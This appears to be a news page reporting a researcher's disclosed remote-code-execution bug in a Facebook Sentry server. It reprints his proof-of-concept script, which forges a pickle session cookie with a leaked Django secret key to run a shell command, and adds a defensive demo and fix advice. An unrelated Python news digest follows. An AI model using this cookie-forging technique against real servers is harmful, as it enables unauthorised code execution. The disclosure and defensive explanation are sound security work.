Another Facebook Vulnerability to be Found

Cybersecurity specialist from SCRT finds a way to execute code remotely on a Facebook server
27 August 2018   1881

Daniel Le Gall from SCRT reported a vulnerability he found in one of Facebook's servers. The problem was in Sentry, a log storage web application written in Python on the Django framework. Facebook's engineers have already patched the hole.

Daniel found the problem while scanning IP addresses belonging to the social network. On one of them a Sentry service was running (the host name is not reproduced in the article). While reviewing the application, he noticed a stack trace that appeared for no obvious reason, as well as problems with the password reset function. According to him, Django's debug mode had not been disabled, so the trace exposed the program's entire environment:

[Screenshot: Facebook Vulnerability]

Among the environment settings, the SCRT expert spotted SESSION_SERIALIZER, set to django.contrib.sessions.serializers.PickleSerializer. Daniel explained that a forged session containing arbitrary data in Pickle, Python's binary object serialization protocol, lets anyone run code on the system. To forge a session he needed the Django secret key, which appeared in plaintext in the Sentry settings list under the name system.secret-key:

[Screenshot: Facebook Vulnerability]

The researcher wrote a proof-of-concept script that replaced the contents of the existing sentrysid cookie with an arbitrary object and made the page take 30 seconds longer to load:

import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

# Values not reproduced in the article: the key read from the exposed
# system.secret-key setting and the sentrysid cookie issued by Sentry
SECRET_KEY = '<value of system.secret-key>'
cookie = '<original sentrysid cookie value>'

# Initial cookie I had on sentry when trying to reset a password
newContent = django.core.signing.loads(cookie, key=SECRET_KEY, serializer=django.contrib.sessions.serializers.PickleSerializer, salt='django.contrib.sessions.backends.signed_cookies')

# Object whose unpickling calls os.system("sleep 30") on the server
class PickleRce(object):
    def __reduce__(self):
        return (os.system, ("sleep 30",))

newContent['testcookie'] = PickleRce()

# Re-sign the modified session with the leaked key (Python 2 print statement)
print django.core.signing.dumps(newContent, key=SECRET_KEY, serializer=django.contrib.sessions.serializers.PickleSerializer, salt='django.contrib.sessions.backends.signed_cookies', compress=True)
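Why the combination of a leaked key and PickleSerializer is what matters: the signature only proves that a cookie was produced with SECRET_KEY, and once the key is exposed the serializer decides what a verified payload can do. The following is an added example, not from the article or from SCRT, using a hypothetical stand-in for Django's signed-cookie scheme (not Django's code) and a harmless builtin in place of the PoC's os.system; it contrasts PickleSerializer with JSONSerializer (Django's default), which has no code path to run, and shows a restricted unpickler that rejects every global reference as a fallback for legacy pickle sessions.

```python
import base64, hashlib, hmac, io, json, pickle

# Hypothetical stand-in for Django's signed-cookie scheme (not Django's code):
# cookie = base64(payload) + ":" + HMAC-SHA256(key, salt + payload)
def sign(payload: bytes, key: bytes, salt: bytes) -> str:
    mac = hmac.new(key, salt + payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + ":" + mac

def unsign(cookie: str, key: bytes, salt: bytes) -> bytes:
    b64, _, mac = cookie.rpartition(":")
    payload = base64.urlsafe_b64decode(b64)
    expected = hmac.new(key, salt + payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("bad signature")  # integrity check only: anyone holding the key passes it
    return payload

class Marker:  # benign analogue of the PoC's PickleRce: a builtin stands in for os.system
    def __reduce__(self):
        return (sorted, ("cab",))  # unpickling calls sorted("cab") and stores the result

class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup: plain data restores, any callable reference fails."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def load_session(cookie, key, salt, serializer):
    payload = unsign(cookie, key, salt)  # passes for any cookie signed with the leaked key
    if serializer == "pickle":  # what PickleSerializer does with the verified payload
        return pickle.loads(payload)
    if serializer == "restricted":
        return RestrictedUnpickler(io.BytesIO(payload)).load()
    return json.loads(payload)  # JSONSerializer: only data types, no callable can be encoded

def demo():
    key, salt = b"leaked-secret-key", b"django.contrib.sessions.backends.signed_cookies"
    forged = sign(pickle.dumps({"_auth_user_id": "1", "m": Marker()}), key, salt)
    out = {"pickle_ran_callable": load_session(forged, key, salt, "pickle")["m"] == list("abc")}
    try:
        load_session(forged, key, salt, "restricted"); out["restricted_blocked"] = False
    except pickle.UnpicklingError:
        out["restricted_blocked"] = True
    benign = sign(pickle.dumps({"_auth_user_id": "1"}), key, salt)
    out["restricted_loads_data"] = load_session(benign, key, salt, "restricted") == {"_auth_user_id": "1"}
    plain = sign(json.dumps({"_auth_user_id": "1"}).encode(), key, salt)
    out["json_is_data"] = load_session(plain, key, salt, "json") == {"_auth_user_id": "1"}
    try:
        load_session(forged, b"other-key", salt, "pickle"); out["tamper_rejected"] = False
    except ValueError:
        out["tamper_rejected"] = True
    return out
```

The fix Django itself recommends is the first branch never being reachable: keep SESSION_SERIALIZER on JSONSerializer, and treat a leaked SECRET_KEY as a reason to rotate it, since signing cannot distinguish the server from anyone else who holds the key.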

He reported the vulnerability to the Facebook team and received $5,000 under the bug bounty program. The company fixed the issue 10 days after receiving the report.

Python News Digest 12 - 18.10

How to Read SAS Files in Python With Pandas, Python 3.8 and its features, binning data with pandas qcut and cut, and much more interesting stuff
18 October 2019   64

Greetings! I hope your week went great! Here's the new Python news digest.

The biggest news in the Python world this week is the release of Python 3.8. Beginners can also get familiar with meta-programming and the Emacs editor, and the new Django version and other topics are covered too.

• Meta-Programming in Python

A short but complete guide to decorators and metaclasses.

• Emacs: The Best Python Editor?

A guide for beginners to the popular Python editor.

• How to Read SAS Files in Python With Pandas

With this guide, you will learn how to read SAS (.sas7bdat) files in Python, and how to write a SAS file to CSV using Pandas and pyreadstat.

• Cool New Features in Python 3.8

Learn about some of the biggest changes in the new language update.

• Thousands of Scientific Papers May Be Invalid Due to Misunderstanding Python

It was assumed that glob.glob() returns a sorted list of files, but it doesn't; this led to a huge number of issues in several published scientific papers.

• Binning Data With Pandas qcut And cut

This post explains the differences between the two commands and when and how to use each.

• Top Three Mistakes With K-Means Clustering During Data Analysis

A close look at three cases where the k-means clustering algorithm does not perform well or may produce unintuitive results.

• Python 3.8.0 Released

The new release contains assignment expressions, positional-only arguments and more.

• Django 3.0 beta 1 released

Another update of the popular Python framework.

• PyPy V7.2 Released

A new release of the Python implementation written in Python (rather than in C, like the original) brings many new features, such as ARM aarch64 support, a new JSON decoder, the return of sandboxing, and more.